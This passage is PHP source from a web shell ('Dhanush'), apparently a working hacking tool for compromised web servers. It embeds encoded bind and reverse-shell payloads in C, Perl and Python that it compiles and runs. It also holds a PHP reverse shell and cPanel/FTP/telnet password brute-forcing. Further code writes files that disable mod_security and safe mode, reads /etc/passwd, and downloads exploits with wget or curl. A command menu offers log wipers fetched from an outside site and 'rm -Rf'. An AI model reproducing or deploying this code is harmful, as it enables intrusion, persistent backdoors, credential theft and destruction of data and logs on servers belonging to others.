5519 if(ajaxRequest.readyState == 4)
5520 {
5521 document.getElementById("showmal").innerHTML=ajaxRequest.responseText;
5522 }
5523 }
5524
5525 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+malwork+"&path="+malpath, true);
5526 ajaxRequest.send(null);
5527}
5528function getexploit(wurl,path,functiontype)
5529{
5530 document.getElementById("showexp").innerHTML=waitstate;
5531 var ajaxRequest;
5532 ajaxRequest = new XMLHttpRequest();
5533
5534 ajaxRequest.onreadystatechange = function()
5535 {
5536 if(ajaxRequest.readyState == 4)
5537 {
5538 document.getElementById("showexp").innerHTML=ajaxRequest.responseText;
5539 }
5540 }
5541
5542 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?uploadurl&wurl="+wurl+"&functiontype="+functiontype+"&path="+path, true);
5543 ajaxRequest.send(null);
5544}
5545function showMsg(msg)
5546{
5547 if(msg == 'smf')
5548 {
5549 document.getElementById('tableprefix').value="smf_";
5550 document.getElementById('fid').style.display='block';
5551 document.getElementById('wpress').style.display='none';
5552 document.getElementById('joomla').style.display='none';
5553 }
5554 if(msg == 'mybb')
5555 {
5556 document.getElementById('tableprefix').value="mybb_";
5557 document.getElementById('wpress').style.display='none';
5558 document.getElementById('joomla').style.display='none';
5559 document.getElementById('fid').style.display='block';
5560 }
5561 if(msg == 'ipb' || msg == 'vb')
5562 {
5563 document.getElementById('tableprefix').value="";
5564 document.getElementById('wpress').style.display='none';
5565 document.getElementById('joomla').style.display='none';
5566 document.getElementById('fid').style.display='block';
5567 }
5568 if(msg == 'wp')
5569 {
5570 document.getElementById('tableprefix').value="wp_";
5571 document.getElementById('wpress').style.display='block';
5572 document.getElementById('fid').style.display='none';
5573 document.getElementById('joomla').style.display='none';
5574 }
5575 if(msg == 'joomla')
5576 {
5577 document.getElementById('joomla').style.display='block';
5578 document.getElementById('tableprefix').value="jos_";
5579 document.getElementById('wpress').style.display='none';
5580 document.getElementById('fid').style.display='none';
5581
5582
5583 }
5584}
5585function checkforum(msg)
5586{
5587 if(msg == 'smf')
5588 {
5589 document.getElementById('tableprefix').value="smf_";
5590 document.getElementById('smfipb').style.display='block';
5591 document.getElementById('myjoomla').style.display='none';
5592 document.getElementById('wordpres').style.display='none';
5593 }
5594 if(msg == 'phpbb')
5595 {
5596 document.getElementById('tableprefix').value="phpb_";
5597 document.getElementById('myjoomla').style.display='none';
5598 document.getElementById('smfipb').style.display='block';
5599 document.getElementById('wordpres').style.display='none';
5600 }
5601 if(msg == 'mybb')
5602 {
5603 document.getElementById('tableprefix').value="mybb_";
5604 document.getElementById('myjoomla').style.display='none';
5605 document.getElementById('smfipb').style.display='none';
5606 }
5607 if(msg == 'vb')
5608 {
5609 document.getElementById('tableprefix').value="";
5610 document.getElementById('myjoomla').style.display='none';
5611 document.getElementById('smfipb').style.display='none';
5612 }
5613 if(msg == 'ipb')
5614 {
5615 document.getElementById('myjoomla').style.display='none';
5616 document.getElementById('smfipb').style.display='block';
5617 document.getElementById('tableprefix').value="";
5618 document.getElementById('wordpres').style.display='none';
5619
5620 }
5621 if(msg == 'wp')
5622 {
5623 document.getElementById('tableprefix').value="wp_";
5624 document.getElementById('myjoomla').style.display='none';
5625 document.getElementById('smfipb').style.display='block';
5626 document.getElementById('wordpres').style.display='block';
5627 }
5628 if(msg == 'joomla')
5629 {
5630 document.getElementById('myjoomla').style.display='block';
5631 document.getElementById('tableprefix').value="jos_";
5632 document.getElementById('smfipb').style.display='none';
5633
5634 }
5635}
5636</script>
5637<body>
5638<?php
5639
5640$back_connect_p="eNqlU01PwzAMvVfqfwjlkkpd94HEAZTDGENCCJC2cRrT1DUZCWvjqk5A/fcs3Rgg1gk0XxLnPT/bsnN60rZYthdKt4vKSNC+53sqL6A0BCuMCEK6EiYi4O52UZSQCkTHkoCGMMeKk/Llbdqd+V4dx4jShu7ee7PQ0TdCMQrDxTKxmTEqF2ANPe/U+LtUmSDdC98ja0NYOe1tTH3Qrde/md8+DCfR1h0/Du7m48lo2L8Pd7FxClqL1FDqqoxcWeE3FIXmNGBH2LMOfum1mu1aJtqibCY4vcs/Cg6AC06uKtIvX63+j+CxHe+pkLFxhUbkSi+BsU3eDQsw5rboUcdermergYZR5xDYPQT2DoFnn8OQIsvc4uw2NU6TLKPTwOokF0EUtJJgFu5r4wlFSRT/2UOznuJfOo2k+l+hdGnVmv4Bmanx6Q==";
5641
5642$backconnect_perl="eNqlUl9rwjAQfxf8Drcqa4UWt1dLZU7rJmN2tNWXTUps45qtJiVNGf32S9pOcSAI3kNI7vcnd9z1boZlwYdbQoc55llZYFh4o1HA4m8s7G6n2+kXVSHwHmQ4oNfMLSpSXYL9if80dR7kuZYvpW110LzmJMPPiCYZVplup6hRI/CmL25owts8WizVRSWiIPTdyasJn1jknAm2rSjaY0MXca4PBtI/ZpTi+ChXbihJeESooSpZv99vTCAUiwgJ9pe72wykuv6+EVpjVAq2k62mRg2wHFMjCGeLpQna+LZhaSeQtwrNM5Dr+/+hnBMqQHOuiA+q2Qcj63zMUkRlI+cJlxhNWYITeKxgwr9KeonRda01Vs1aGRqOUwaW5ThBnSB0xxzHsmwo1fzBQjYoin3grQrMjyyS2KfwjHC5JYxXDZ7/tAQ4fpTiLFMoqHm1dbRrrhat53rzX0SL2FA=";
5643
5644$bind_port_c="bZJRT9swEIDfK/U/eEVa7WJK0mkPrMukaoCEpnUT8DKVKjK2Q05LbMt2KGzw3+ekKQ0Zfkn83efL3TkHoHhRCYk+Oy9AT/Mvw8FBh1lQdz1YKQhuDyrpxe1/p0UBWwjKo5KBwvULs3ecIp4ziyaTsLkn6O9wgMKqo45yCvPtvnHM6kO0bkEoqOLB0fw3E8KmoJBtQ4LJUisc04jsZJQ0pvR4cZ5eLM+u6dWPr9/Sq+vLs8X3vQcZfucIstJXVqGjuMV26kClGSuheAyZ2hSvgkZbH0K518ph5jXgup1VvCbklVfXOnXNo9ULfLFcnJ5epovlr517C0pgRxHudYkm5L2lKHqIX0ouwhVIVcsfd2iTQyFx/DLLZn4J41waH8Ro328zrcrMMH+TxW+wWZdtLHgZ4Ognc26jrfg0oiddwUomQtxQB3+kzrAh3WimLYYkmkP9exWhC0PmcHhI9kZ7KQibFaxRkqDxjRoT9PTUJTaQ3pl6bYUQj8adb0LWTJWXZntDszU1pM4T9VK4xzDYEo+Ow2UcuxwdwahbOy+0C63v0PNw8PwP";
5645
5646$bind_port_p="bZFvS8NADMZft9DvkNUxW6hsw5f+wbJVHc5WelUQldK1mTucd6W94cTtu3tpN1DxXS753ZMnyUGnv6qr/oyLfonV0jK77DqYTs/sJlUv4IjbJ5bJ5+Bc+PHVA5zC0IUvwDVXztA9ga1lrmoEJvM3VJqsm8BhXu/uMp2EQeL1WDS6SVkSB/6t94qqrKSSs0+RvaNzqPLy0HVhs4GCI9ijTCjIK8wUQqv0LKh/jYqesiRlFk1T0tTaLErj4J4F/ngce9qOZWrbhWaIzoqiSrlwumT8afDiTULiUj98/NtSliiglNWu3ZLXCoWWOf7DtYUf5MeCL9GhlVimkeU5aoejKAw9RmYMPnc6TrfkxdlcVm9uixl7PSEVUN4G2m+nwDkXWADxzW+jscWS8ST07NMe6dq/8tF94tnn/xSCOP5dwDXm0N52P1FZcT0RIbvhiFnpxbdYO59h5Eup70vYTogrGFCoL7/9Bg==";
5647shellstyle();
5648?>
5649<div align="center">
5650<a href="<?php $_SERVER['PHP_SELF'];?>"><font size="6" color="#FF0000" style="text-decoration:none;" face="Times New Roman, Times, serif">Dhanush : By Arjun </font></a>
5651
5652</div>
5653<hr color="#1B1B1B">
5654
5655<table cellpadding="0" style="width:100%;">
5656 <tr>
5657 <td colspan="2" style="width:75%;">System Info : <font class="txt"><?php systeminfo(); ?></font></td>
5658 <td style="width:10%;">Server Port : <font class="txt"><?php serverport(); ?></font></td>
5659 <td style="width:15%;"><a href=# onClick="maindata('com')"><font class="txt"><i>Software Info</i></font></a></td>
5660 </tr>
5661 <?php if($os != 'Windows' || shell_exec("id") != null) { ?><tr>
5662 <td style="width:75%;" colspan="2">Uid : <font class="txt"><?php echo shell_exec("id"); ?></font></td>
5663 <?php $d0mains = @file("/etc/named.conf");
5664 $users=@file('/etc/passwd');
5665 if($d0mains)
5666 {
5667 $count;
5668 foreach($d0mains as $d0main)
5669 {
5670 if(@ereg("zone",$d0main))
5671 {
5672 preg_match_all('#zone "(.*)"#', $d0main, $domains);
5673 flush();
5674 if(strlen(trim($domains[1][0])) > 2)
5675 {
5676 flush();
5677 $count++;
5678 }
5679 }
5680 }
5681 ?><td colspan=2 style="width:75%;">Websites : <font class="txt"><?php echo "$count Domains"; ?></font></td><?php
5682 }
5683 else if($users)
5684 {
5685 $file = fopen("/etc/passwd", "r");
5686 while(!feof($file))
5687 {
5688 $s = fgets($file);
5689 $matches = array();
5690 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
5691 $matches = str_replace("home/","",$matches[1]);
5692 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
5693 continue;
5694 $count++;
5695 }
5696 ?><td colspan=2 style="width:75%;">Websites : <font class="txt"><?php echo "$count Domains"; ?></font></td><?php } ?>
5697 </tr><?php } ?>
5698 <tr>
5699 <td style="width:20%;">Disk Space : <font class="txt"><?php echo HumanReadableFilesize(diskSpace()); ?></font></td>
5700 <td style="width:20%;">Free Space : <font class="txt"><?php echo HumanReadableFilesize(freeSpace()); $dksp = diskSpace(); $frsp = freeSpace(); echo " (".(int)($frsp/$dksp*100)."%)"; ?></font></td>
5701
5702 <td style="width:20%;">Server IP : <font class="txt"><a href="http://whois.domaintools.com/<?php serverip(); ?>"><?php serverip(); ?></a></font></td>
5703 <td style="width:15%;">Your IP : <font class="txt"><a href="http://whois.domaintools.com/<?php yourip(); ?>"><?php yourip(); ?></a></font></td>
5704 </tr>
5705
5706 <tr>
5707 <?php if($os == 'Windows'){ ?><td style="width:15%;">View Directories : <font class="txt"><?php echo showDrives();?></font></td><?php } ?>
5708 <td style="width:30%;">Current Directory : <span id="crdir"><font color="#009900">
5709 <?php
5710 $d = str_replace("\\",$directorysperator,$dir);
5711 if (substr($d,-1) != $directorysperator) {$d .= $directorysperator;}
5712 $d = str_replace("\\\\","\\",$d);
5713 $dispd = htmlspecialchars($d);
5714 $pd = $e = explode($directorysperator,substr($d,0,-1));
5715 $i = 0;
5716 foreach($pd as $b)
5717 {
5718 $t = '';
5719 $j = 0;
5720 foreach ($e as $r)
5721 {
5722 $t.= $r.$directorysperator;
5723 if ($j == $i) {break;}
5724 $j++;
5725 }
5726$href=addslashes($t);
5727
5728 echo "<a href=javascript:void(0) onClick=\"changedir('dir','$href')\"><b><font class=\"txt\">".htmlspecialchars($b).$directorysperator.'</font></b></a>';
5729 $i++;
5730 }
5731
5732 ?>
5733 </font></span> <a href=# onClick="gethome('home','<?php echo addslashes(getcwd()); ?>')">[Home]</a></td>
5734 <td style="width:20%;">Disable functions : <font class="txt"><?php echo getDisabledFunctions(); ?> </font></td>
5735 <td>Safe Mode : <font class=txt><?php echo safe(); ?></font></td>
5736 <?php if($os == "Linux") { ?><td><a href="<?php echo $self.'?downloadit'?>"><font color="#FF0000">Download It</font></a><?php } ?></td>
5737 </tr>
5738 </table>
5739
5740<?php $m1 = array('Symlink'=>'symlinkserver','Forum'=>'forum','Sec. Info'=>'secinfo','Code Inject'=>'injector','Bypassers'=>'bypass','Server Fuzzer'=>'fuzz','Zone-h'=>'zone','DoS'=>'dos','Mail'=>'mailbomb','Tools'=>'tools','PHP'=>'phpc','Exploit'=>'exploit','Connect'=>'connect');
5741 $m2 = array('SQL'=>'database','404 Page'=>'404','Malware Attack'=>'malattack','Cpanel Cracker'=>'cpanel','About'=>'about');
5742 echo "<table border=3 style=border-color:#333333; width=100%; cellpadding=2>
5743 <tr>";
5744 $menu = '';
5745
5746 foreach($m1 as $k => $v)
5747 $menu .= "<td style=\"border:none;\"><a href=# onClick=\"maindata('".$v."')\"><font class=\"mainmenu\">[".$k."]</font></a></td>";
5748 echo $menu;
5749 echo "</tr>
5750</table>
5751<div style=\"float:left;\">
5752 <a href=\"javascript:history.back(1)\"><font class=txt size=3> [Back] </font></a>
5753 <a href=\"javascript:history.go(1)\"><font class=txt size=3> [Forward] </font></a>
5754 <a href=\"\"><font class=txt size=3> [Refresh] </font></a></div>
5755<table style=\"margin-left:270px; border-color:#333333;\" border=2 width=60%; cellpadding=2>
5756 <tr align=center>";
5757 foreach($m2 as $k => $v)
5758 $menu1 .= "<td style=\"border:none;\"><a href=# onClick=\"maindata('".$v."','".addslashes($_GET['dir'])."')\"><font class=\"mainmenu\">[".$k."]</font></a></td>";
5759 echo $menu1;
5760 echo "<td style=\"border:none;\"><a href=javascript:void(0) onClick=\"if(confirm('Are You Sure You Want To Kill This Shell ?')){getmydata('selfkill');}else{return false;}\"><font class=mainmenu>[SelfKill]</font></a></td>
5761 <td style=\"border:none;\"><a href=\"$self?logout\"><font class=mainmenu>[LogOut]</font></a></td>
5762 </tr>
5763</table>";?>
5764
5765<div id="showmaindata"></div>
5766<?php
5767
5768if(isset($_GET["downloadit"]))
5769{
5770 $FolderToCompress = getcwd();
5771 execmd("tar --create --recursion --file=backup.tar $FolderToCompress");
5772
5773 $prd=explode("/","backup.tar");
5774 for($i=0;$i<sizeof($prd);$i++)
5775 {
5776 $nfd=$prd[$i];
5777 }
5778 @ob_clean();
5779 header("Content-type: application/octet-stream");
5780 header("Content-length: ".filesize($nfd));
5781 header("Content-disposition: attachment; filename=\"".$nfd."\";");
5782 readfile($nfd);
5783 exit;
5784}
5785//Turn Safe Mode Off
5786
5787 if(getDisabledFunctions() != "None" || safe() != "OFF")
5788 {
5789 $file_pointer = fopen(".htaccess", "w+");
5790 fwrite($file_pointer, "<IfModule mod_security.c>
5791 SecFilterEngine Off
5792 SecFilterScanPOST Off
5793 </IfModule> \n\r");
5794
5795 $file_pointer = fopen("ini.php", "w+");
5796 fwrite($file_pointer, "<?
5797echo ini_get(\"safe_mode\");
5798echo ini_get(\"open_basedir\");
5799include(\$_GET[\"file\"]);
5800ini_restore(\"safe_mode\");
5801ini_restore(\"open_basedir\");
5802echo ini_get(\"safe_mode\");
5803echo ini_get(\"open_basedir\");
5804include(\$_GET[\"ss\"]);
5805?>");
5806
5807 $file_pointer = fopen("php.ini", "w+");
5808 fwrite($file_pointer, "safe_mode = Off");
5809
5810 fclose($file_pointer);
5811
5812 }
5813
5814 else if(isset($_POST['cpanelattack']))
5815 {
5816 if(!empty($_POST['username']) && !empty($_POST['password']))
5817 {
5818 $userlist=explode("\n",$_POST['username']);
5819 $passlist=explode("\n",$_POST['password']);
5820
5821 if($_POST['cracktype'] == "ftp")
5822 {
5823 foreach ($userlist as $user)
5824 {
5825 $pureuser = trim($user);
5826 foreach ($passlist as $password )
5827 {
5828 $purepass = trim($password);
5829 ftp_check($_POST['target'],$pureuser,$purepass,$connect_timeout);
5830 }
5831 }
5832 }
5833 if ($_POST['cracktype'] == "cpanel" || $_POST['cracktype'] == "telnet")
5834 {
5835 if($cracktype == "telnet")
5836 $cpanel_port="23";
5837 else
5838 $cpanel_port="2082";
5839 foreach ($userlist as $user)
5840 {
5841 $pureuser = trim($user);
5842
5843 echo "<b><font face=Tahoma style=\"font-size: 9pt\" color=#008000> [ - ] </font><font face=Tahoma style=\"font-size: 9pt\" color=#FF0800>
5844 Processing user $pureuser ...</font></b><br><br>";
5845
5846 foreach ($passlist as $password )
5847 {
5848 $purepass = trim($password);
5849 cpanel_check($_POST['target'],$pureuser,$purepass,$connect_timeout);
5850
5851 }
5852 }
5853 }
5854 }
5855 else
5856 $bdmessage = "<center>Enter Username & Password List<center>";
5857 }
5858
5859else if(isset($_GET['info']))
5860{
5861 $bdmessage = "<br><div align=left><font class=txt>".nl2br(shell_exec("whois ".$_GET['info']))."</font></div>";
5862}
5863else if(isset($_POST['u']))
5864{
5865 $path = $_REQUEST['path'];
5866 if(is_dir($path))
5867 {
5868 $setuploadvalue = 0;
5869 $uploadedFilePath = $_FILES['uploadfile']['name'];
5870 $tempName = $_FILES['uploadfile']['tmp_name'];
5871 if($os == "Windows")
5872 $uploadPath = $path . $directorysperator . $uploadedFilePath;
5873 else if($os == "Linux")
5874 $uploadPath = $path . $directorysperator . $uploadedFilePath;
5875 if($stat = move_uploaded_file($_FILES['uploadfile']['tmp_name'] , $uploadPath))
5876 $bdmessage = "<font class=txt size=3><blink>File uploaded to $uploadPath</blink></font>";
5877 else
5878 $bdmessage = "<font size=3><blink>Failed to upload file to $uploadPath</blink></font>";
5879 }
5880 ?><script type="text/javascript">changedir('dir','<?php echo addslashes($path); ?>'); </script><?php
5881}
5882else if(isset($_POST['backdoor']))
5883{
5884 if(isset($_POST['passwd']) && isset($_POST['port']) && isset($_POST['lang']))
5885 { ?><script type="text/javascript">gethome('connect');</script><?php
5886 $passwd = $_POST['passwd'];
5887
5888 if($_POST['lang'] == 'c')
5889 {
5890 if(is_writable("."))
5891 {
5892 @$fh=fopen(getcwd()."/backp.c",'w');
5893 @fwrite($fh,gzinflate(base64_decode($bind_port_c)));
5894 @fclose($fh);
5895 execmd("chmod 0755 ".getcwd()."/backp.c");
5896 execmd("gcc -o ".getcwd()."/backp ".getcwd()."/backp.c");
5897 execmd("chmod 0755 ".getcwd()."/backp");
5898 execmd(getcwd()."/backp"." ".$_POST['port']." ". $passwd ." &");
5899 $scan = exec_all("ps aux | grep backp".$_POST['port']);
5900 if(eregi("backp".$_POST['port'],$scan))
5901 $bdmessage = "Process found running, backdoor setup successfully.";
5902 else
5903 $bdmessage = "Process not found running, backdoor not setup successfully.";
5904 }
5905 else
5906 {
5907 @$fh=fopen("/tmp/backp.c","w");
5908 @fwrite($fh,gzinflate(base64_decode($bind_port_c)));
5909 @fclose($fh);
5910 execmd("chmod 0755 /tmp/backp.c");
5911 execmd("gcc -o /tmp/backp /tmp/backp.c");
5912 $out = execmd("/tmp/backp"." ".$_POST['port']." ". $passwd ." &");
5913 $scan = exec_all("ps aux | grep backp".$_POST['port']);
5914 if(eregi("backp".$_POST['port'],$scan))
5915 $bdmessage = "Process found running, backdoor setup successfully.";
5916 else
5917 $bdmessage = "Process not found running, backdoor not setup successfully.";
5918 }
5919 }
5920 if($_POST['lang'] == 'perl')
5921 {
5922 if(is_writable("."))
5923 {
5924 @$fh=fopen(getcwd()."/bp.pl",'w');
5925 @fwrite($fh,gzinflate(base64_decode($bind_port_p)));
5926 @fclose($fh);
5927 execmd("chmod 0755 ".getcwd()."/bp.pl");
5928 execmd("perl ".getcwd()."/bp.pl ".$_POST['port']." ". $passwd ." &");
5929
5930 $bdmessage = "<pre>$out\n".execmd("ps aux | grep bp.pl")."</pre>";
5931 }
5932 else
5933 {
5934 @$fh=fopen("/tmp/bp.pl","w");
5935 @fwrite($fh,gzinflate(base64_decode($bind_port_p)));
5936 @fclose($fh);
5937 execmd("chmod 0755 ".getcwd()."/bp.pl");
5938 execmd("perl ".getcwd()."/bp.pl ".$_POST['port']." ". $passwd ." &");
5939 $bdmessage = "<pre>$out\n".execmd("ps aux | grep bp.pl")."</pre>";
5940 }
5941 }
5942 }
5943}
5944else if(isset($_POST['backconnect']))
5945{
5946 if($_POST['ip'] != "" && $_POST['port'] != "")
5947 { ?><script type="text/javascript">gethome('connect');</script><?php
5948 $host = $_POST['ip'];
5949 $port = $_POST['port'];
5950 if($_POST["lang"] == "perl")
5951 {
5952 if(is_writable("."))
5953 {
5954 @$fh=fopen(getcwd()."/bc.pl",'w');
5955 @fwrite($fh,gzuncompress(base64_decode($backconnect_perl)));
5956 @fclose($fh);
5957 $bdmessage = "<font color='#FFFFFF'>Trying to connect...</font>";
5958 execmd("perl ".getcwd()."/bc.pl $host $port &",$disable);
5959 if(!@unlink(getcwd()."/bc.pl")) echo "<font color='#FFFFFF' size=3>Warning: Failed to delete reverse-connection program</font></br>";
5960 }
5961 else
5962 {
5963 @$fh=fopen("/tmp/bc.pl","w");
5964 @fwrite($fh,gzuncompress(base64_decode($backconnect_perl)));
5965 @fclose($fh);
5966 $bdmessage = "<font color='#FFFFFF'>Trying to connect...</font>";
5967 execmd("perl /tmp/bc.pl $host $port &",$disable);
5968 if(!@unlink("/tmp/bc.pl"))
5969 echo "<h2>Warning: Failed to delete reverse-connection program</h2></br>";
5970 }
5971 }
5972 else if($_POST["lang"] == "python")
5973 {
5974 if(is_writable("."))
5975 {
5976 $w_file=@fopen(getcwd()."/bc.py","w") or die(mysql_error());
5977 if($w_file)
5978 {
5979 @fputs($w_file,gzuncompress(base64_decode($back_connect_p)));
5980 @fclose($w_file);
5981 chmod(getcwd().'/bc.py', 0777);
5982 }
5983 execmd("python ".getcwd()."/bc.py $host $port &",$disable);
5984 $bdmessage = "<font color='#FFFFFF'>Trying to connect...</font>";
5985
5986 if(!@unlink(getcwd()."/bc.py"))
5987 echo "<h2>Warning: Failed to delete reverse-connection program</h2></br>";
5988 }
5989 else
5990 {
5991 $w_file=@fopen("/tmp/bc.py","w");
5992 if($w_file)
5993 {
5994 @fputs($w_file,gzuncompress(base64_decode($back_connect_p)));
5995 @fclose($w_file);
5996 chmod('/tmp/bc.py', 0777);
5997 }
5998 execmd("python /tmp/bc.py $host $port &",$disable);
5999 $bdmessage = "<font color='#FFFFFF'>Trying to connect...</font>";
6000 if(!@unlink("/tmp/bc.py"))
6001 echo "<h2>Warning: Failed to delete reverse-connection program</h2><br>";
6002 }
6003 }
6004 else if($_POST["lang"] == "php")
6005 {
6006 $bdmessage = "<font color='#FFFFFF'>Trying to connect...</font>";
6007 $ip = $_POST['ip'];
6008 $port=$_POST['port'];
6009 $sockfd=fsockopen($ip , $port , $errno, $errstr );
6010 if($errno != 0)
6011 {
6012 $bdmessage = "<font color='red'><b>$errno</b> : $errstr</font>";
6013 }
6014 else if (!$sockfd)
6015 {
6016 $result = "<p>Fatal : An unexpected error was occured when trying to connect!</p>";
6017 }
6018 else
6019 {
6020 fputs ($sockfd ,"\n=================================================================\nCoded By Arjun\n=================================================================");
6021 $pwd = exec_all("pwd");
6022 $sysinfo = exec_all("uname -a");
6023 $id = exec_all("id");
6024 $len = 1337;
6025 fputs($sockfd ,$sysinfo . "\n" );
6026 fputs($sockfd ,$pwd . "\n" );
6027 fputs($sockfd ,$id ."\n\n" );
6028 fputs($sockfd ,$dateAndTime."\n\n" );
6029 while(!feof($sockfd))
6030 {
6031 $cmdPrompt ="(dhanush)[$]> ";
6032 fputs ($sockfd , $cmdPrompt );
6033 $command= fgets($sockfd, $len);
6034 fputs($sockfd , "\n" . exec_all($command) . "\n\n");
6035 }
6036 fclose($sockfd);
6037 }
6038 }
6039 }
6040}
6041else if (isset ($_GET['val1'], $_GET['val2']) && is_numeric($_GET['val1']) && is_numeric($_GET['val2']))
6042{
6043 $temp = "";
6044 for(;$_GET['val1'] <= $_GET['val2'];$_GET['val1']++)
6045 {
6046 $uid = @posix_getpwuid($_GET['val1']);
6047 if ($uid)
6048 $temp .= join(':',$uid)."\n";
6049 }
6050 echo '<br/>';
6051 paramexe('Users', $temp);
6052}
6053else if(isset($_GET['download']))
6054{
6055 download();
6056}
6057else
6058{
6059 ?><script type="text/javascript">gethome('home','<?php echo addslashes($dir); ?>');</script><?php
6060}
6061$is_writable = is_writable($dir)?"<font class=txt>< writable ></font>":"< not writable >";
6062?>
6063</p><center><div id="showdir"><?php echo $bdmessage; ?></div></center>
6064<table style="width:100%;border-color:#333333;" border="1">
6065<tr>
6066<td align="center">
6067<form method="post" enctype="multipart/form-data">
6068Upload file : <br><input type="file" name="uploadfile" class="box" size="50">
6069<input type="hidden" id=path name="path" value="<?php echo $dir; ?>" />
6070<input type=submit value="Upload" name="u" value="u" class="but" ></form>
6071<span name="wrtble"><?php
6072echo $is_writable; ?></span>
6073 <br>
6074</td>
6075<td align="center" style="height:105px;">Create File :
6076<form onSubmit="createdir('Create',createfile.value);return false;">
6077<input type="text" class="box" value="<?php echo $dir . $directorysperator; ?>" name="createfile" id="createfile">
6078<input type="button" onClick="createdir('Create',createfile.value)" value="Create" class="but">
6079</form><span name="wrtble">
6080<?php echo $is_writable; ?></span>
6081</td>
6082</tr>
6083<tr>
6084<td align="center" style="height:105px;">Execute : <form onSubmit="executemyfile('execute','<?php echo addslashes($dir); ?>',execute.value);return false;">
6085<input type="text" class="box" name="execute">
6086<input type="hidden" id="exepath" name="exepath" value="<?php echo $dir; ?>">
6087 <input type="button" onClick="executemyfile('execute',exepath.value,execute.value)" value="Execute" class="but"></form></td>
6088
6089<td align="center">Create Directory : <form onSubmit="createdir('createfolder',createfolder.value);return false;">
6090<input type="text" value="<?php echo $dir . $directorysperator; ?>" class="box" name="createfolder" id="createfolder">
6091<input type="button" onClick="createdir('createfolder',createfolder.value)" value="Create" class="but">
6092</form><span name="wrtble"><?php
6093echo $is_writable;
6094?></span></td></tr>
6095<tr><td style="height:105px;" align="center">Get Exploit <form onSubmit="getexploit(wurl.value,path.value,functiontype.value);return false;">
6096<input type="text" name="wurl" class="box" value="http://www.some-code/exploits.c">
6097<input type="button" onClick="getexploit(wurl.value,uppath.value,functiontype.value)" value=" G0 " class="but"><br><br>
6098<input type="hidden" id="uppath" name="uppath" value="<?php echo $dir . $directorysperator; ?>">
6099<select name="functiontype" class="sbox">
6100<option value="wwget">wget</option>
6101<option value="wlynx">lynx</option>
6102<option value="wfread">fread</option>
6103<option value="wfetch">fetch</option>
6104<option value="wlinks">links</option>
6105<option value="wget">GET</option>
6106<option value="wcurl">curl</option>
6107</select>
6108</form><div id="showexp"></div>
6109</td>
6110<td align="center">
6111<form>
6112Some Commands<br>
6113<?php if($os != "Windows")
6114{ ?>
6115<SELECT NAME="mycmd" class="box">
6116 <OPTION VALUE="uname -a">Kernel version
6117 <OPTION VALUE="w">Logged in users
6118 <OPTION VALUE="lastlog">Last to connect
6119 <option value='cat /etc/hosts'>IP Addresses
6120 <option value='cat /proc/sys/vm/mmap_min_addr'>Check MMAP
6121 <OPTION VALUE="logeraser">Log Eraser
6122 <OPTION VALUE="find / -perm -2 -ls">Find all writable directories
6123 <OPTION VALUE="find . -perm -2 -ls">Find all writable directories in Current Folder
6124 <OPTION VALUE="find / -type f -name \"config*\"">find config* files
6125 <OPTION VALUE="find . -type f -name \"config*\"">find config* files in current dir
6126 <OPTION VALUE="find . -type f -perm -04000 -ls">find suid files in current dir
6127 <OPTION VALUE="find / -type f -perm -04000 -ls">find all suid files
6128 <OPTION VALUE="find / -user root -perm -022">find all sgid files
6129 <OPTION VALUE="find . -type f -perm -02000 -ls">find suid files in current dir
6130 <OPTION VALUE="find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null">Suid bins
6131 <OPTION VALUE="cut -d: -f1,2,3 /etc/passwd | grep ::">USER WITHOUT PASSWORD!
6132 <OPTION VALUE="find /etc/ -type f -perm -o+w 2> /dev/null">Write in /etc/?
6133 <?php if(is_dir('/etc/valiases')){ ?><option value="ls -l /etc/valiases">List of Cpanel`s domains(valiases)</option><?php } ?>
6134 <?php if(is_dir('/etc/vdomainaliases')) { ?><option value=\"ls -l /etc/vdomainaliases">List Cpanel`s domains(vdomainaliases)</option><?php } ?>
6135 <OPTION VALUE="which wget curl w3m lynx">Downloaders?
6136 <OPTION VALUE="cat /proc/version /proc/cpuinfo">CPUINFO
6137 <OPTION VALUE="ps aux">Show running proccess
6138 <OPTION VALUE="uptime">Uptime check
6139 <OPTION VALUE="cat /proc/meminfo">Memory check
6140 <OPTION VALUE="netstat -an | grep -i listen">Open ports
6141 <OPTION VALUE="rm -Rf">Format box (DANGEROUS)
6142 <OPTION VALUE="wget www.ussrback.com/UNIX/penetration/log-wipers/zap2.c">WIPELOGS PT1 (If wget installed)
6143 <OPTION VALUE="gcc zap2.c -o zap2">WIPELOGS PT2
6144 <OPTION VALUE="./zap2">WIPELOGS PT3
6145 <OPTION VALUE="cat /var/cpanel/accounting.log">Get cpanel logs
6146 </SELECT>
6147 <?php } else {?>
6148 <SELECT NAME="mycmd" class="box">
6149 <OPTION VALUE="dir /s /w /b *config*.php">Find *config*.php in current directory
6150 <OPTION VALUE="dir /s /w /b index.php">Find index.php in current dir
6151 <OPTION VALUE="systeminfo">System Informations
6152 <OPTION VALUE="net user">User accounts
6153 <OPTION VALUE="netstat -an">Open ports
6154 <OPTION VALUE="getmac">Get Mac Address
6155 <OPTION VALUE="net start">Show running services
6156 <OPTION VALUE="net view">Show computers
6157 <OPTION VALUE="arp -a">ARP Table
6158 <OPTION VALUE="tasklist">Show Process
6159 <OPTION VALUE="ipconfig/all">IP Configuration
6160
6161 </SELECT>
6162 <?php } ?>
6163 <input type="hidden" id="auexepath" name="auexepath" value="<?php echo $dir; ?>">
6164<input type="button" onClick="executemyfile('mycmd',auexepath.value,mycmd.value)" value="Execute" class="but">
6165</form>
6166</td>
6167</tr></table><br>
6168
6169</td>
6170</tr>
6171</table>
6172
6173<?php
6174
6175
6176//logout
6177
6178if(isset($_GET['logout']))
6179{
6180 setcookie("hacked",time() - 60*60);
6181 header("Location:$self");
6182 ob_end_flush();
6183}
6184?>
6185
6186
